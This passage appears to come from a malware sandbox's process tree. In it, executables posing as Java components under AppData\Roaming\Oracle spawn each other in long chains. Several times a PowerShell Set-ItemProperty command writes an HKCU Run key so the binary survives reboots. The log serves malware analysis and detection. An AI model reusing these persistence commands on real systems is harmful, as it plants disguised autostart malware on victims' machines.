        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        16⤵
        
        PID:11192
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        17⤵
        
        PID:11388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform.exe"
        18⤵
        Modifies registry key
        
        PID:12384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe\"'"
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe"
1⤵
PID:4124
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
  2⤵
  PID:11764
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    3⤵
    PID:11936
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
      4⤵
      PID:12156
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        5⤵
        
        PID:5488
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        6⤵
        
        PID:12448
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        7⤵
        
        PID:12592
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        8⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        9⤵
        
        PID:12796
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        10⤵
        
        PID:64
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        11⤵
        
        PID:8780
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        12⤵
        
        PID:7464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        13⤵
        
        PID:960
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        14⤵
        
        PID:12868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        15⤵
        
        PID:13032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        16⤵
        
        PID:12012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_service.exe"
        17⤵
        Modifies registry key
        
        PID:13232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe\"'"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:13288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe"
1⤵
PID:6536
- C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
  2⤵
  PID:2248
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
    3⤵
    PID:2584
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
      4⤵
      PID:10232
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        5⤵
        
        PID:10764
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        6⤵
        
        PID:9180
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        7⤵
        
        PID:10268
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        8⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        9⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        10⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        11⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        12⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        13⤵
        
        PID:9128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        14⤵
        
        PID:9244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        15⤵
        
        PID:9900
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        16⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        17⤵
        
        PID:9792
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        18⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        19⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        20⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        21⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        22⤵
        
        PID:10400
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        23⤵
        
        PID:10172
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        24⤵
        
        PID:9868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        25⤵
        
        PID:9400
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        26⤵
        
        PID:11496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        27⤵
        
        PID:12392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        28⤵
        
        PID:5464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        29⤵
        
        PID:10792
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        30⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        31⤵
        
        PID:12956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        32⤵
        
        PID:11088
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        33⤵
        
        PID:5624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        34⤵
        
        PID:5728
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        35⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        36⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        37⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        38⤵
        
        PID:12632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        39⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        40⤵
        
        PID:8764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        41⤵
        
        PID:10412
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        42⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        43⤵
        
        PID:7608
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        44⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        45⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        46⤵
        
        PID:6260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        47⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        48⤵
        
        PID:6492
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        49⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        50⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        51⤵
        
        PID:12860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        52⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        53⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        54⤵
        
        PID:3696
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        55⤵
        
        PID:7820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        56⤵
        
        PID:5896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        57⤵
        
        PID:7176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        58⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        59⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        60⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        61⤵
        
        PID:7580
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        62⤵
        
        PID:8496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        63⤵
        
        PID:9552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        64⤵
        
        PID:7416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        65⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        66⤵
        
        PID:7784
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        67⤵
        
        PID:9228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        68⤵
        
        PID:9176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        69⤵
        
        PID:9388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        70⤵
        
        PID:5248
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        71⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        72⤵
        
        PID:2228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        73⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        74⤵
        
        PID:8692
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        75⤵
        
        PID:7584
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        76⤵
        
        PID:10076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        77⤵
        
        PID:6968
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        78⤵
        
        PID:7240
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        79⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        80⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        81⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        82⤵
        
        PID:10440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        83⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        84⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        85⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        86⤵
        
        PID:10356
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        87⤵
        
        PID:10128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        88⤵
        
        PID:9704
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        89⤵
        
        PID:9224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        90⤵
        
        PID:9320
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        91⤵
        
        PID:12392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        92⤵
        
        PID:11136
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport.exe"
        93⤵
        Modifies registry key
        
        PID:11640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe\"'"
        93⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe"
1⤵
PID:6620
- C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  2⤵
  PID:5096
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
    3⤵
    PID:13020
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
      4⤵
      PID:212
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        5⤵
        
        PID:4324
      - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        6⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        7⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        8⤵
        
        PID:8884
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        9⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        10⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_platform.exe"
        11⤵
        Modifies registry key
        
        PID:8644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe\"'"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe"
1⤵
PID:4420
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
  2⤵
  PID:10592
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
    3⤵
    PID:10756
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
      4⤵
      PID:11916
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        5⤵
        
        PID:6988
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        6⤵
        
        PID:6076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        7⤵
        
        PID:8696
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        8⤵
        
        PID:12588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        9⤵
        
        PID:7400
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        10⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        11⤵
        
        PID:3920
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        12⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        13⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        14⤵
        
        PID:1128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        15⤵
        
        PID:8460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        16⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        17⤵
        
        PID:9140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        18⤵
        
        PID:8004
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        19⤵
        
        PID:7500
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        20⤵
        
        PID:8604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        21⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        22⤵
        
        PID:8240
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        23⤵
        
        PID:8528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        24⤵
        
        PID:9404
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        25⤵
        
        PID:8184
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        26⤵
        
        PID:8896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        27⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        28⤵
        
        PID:10912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        29⤵
        
        PID:6848
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        30⤵
        
        PID:10620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        31⤵
        
        PID:10876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        32⤵
        
        PID:11016
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        33⤵
        
        PID:10896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        34⤵
        
        PID:11300
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
